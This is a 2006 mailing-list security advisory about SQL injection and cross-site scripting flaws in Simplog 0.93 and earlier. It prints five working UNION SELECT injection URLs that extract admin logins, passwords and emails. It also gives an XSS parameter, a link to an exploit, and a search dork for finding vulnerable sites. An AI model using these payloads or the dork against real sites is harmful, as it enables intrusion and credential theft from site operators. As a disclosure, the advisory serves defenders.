lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060421215712.2A6271E2@lists.grok.org.uk>
Date: Fri Apr 21 23:55:37 2006
From: nukedx at nukedx.com (Mustafa Can Bjorn IPEKCI)
Subject: Advisory: Simplog <= 0.93 Multiple Remote
	Vulnerabilities.


--Security Report--
Advisory: Simplog <= 0.93 Multiple Remote Vulnerabilities.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 21/04/06 22:13 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@...edx.com
Web: http://www.nukedx.com
}
---
Vendor: Simplog (http://www.simplog.org/)
Version: 0.93 and prior versions must be affected.
About: Via this methods remote attacker can inject arbitrary SQL queries to 
tid parameter in preview.php,
cid,pid and eid in archive.php and pid in comments.php.As u know rgod was 
published advisory about version 0.92 but he
did not notice this SQL injections. He found other SQL injections on 
archive.php but did not found these vulnerabilities.
Also there is cross site scripting vulnerability in imagelist.php's imagedir 
parameter.
Level: Critical
---
How&Example: 
SQL Injection :
Needs MySQL > 4.0
GET -> http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=[SQL]
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&cid=[SQL]
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&pid=[SQL]
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&eid=[SQL]
EXAMPLE -> 

http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=-1/**/UNION/**/SELECT/**/
concat(25552,login,25553,password,25554)/**/from/**/blog_users/**/where/**/admin=1/*
EXAMPLE -> 

http://[victim]/[simplogdir]/archive.php?blogid=1&cid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*
EXAMPLE -> 

http://[victim]/[simplogdir]/archive.php?blogid=1&pid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*
EXAMPLE -> 

http://[victim]/[simplogdir]/archive.php?blogid=1&eid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*
EXAMPLE -> 

http://[victim]/[simplogdir]/comments.php?blogid=1&pid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*
with this examples remote attacker can leak speficied admins login 
information from database.

XSS:
GET -> 

http://[victim]/[simplogdir]/imagelist.php?blogid=1&act=add_entry&login=1&imagedir=[XSS]

---
Timeline:
* 21/04/2006: Vulnerability found.
* 21/04/2006: Contacted with vendor and waiting reply.
---
Exploit:
http://www.nukedx.com/?getxpl=25
---
Dorks: "powered by simplog"
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=25

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ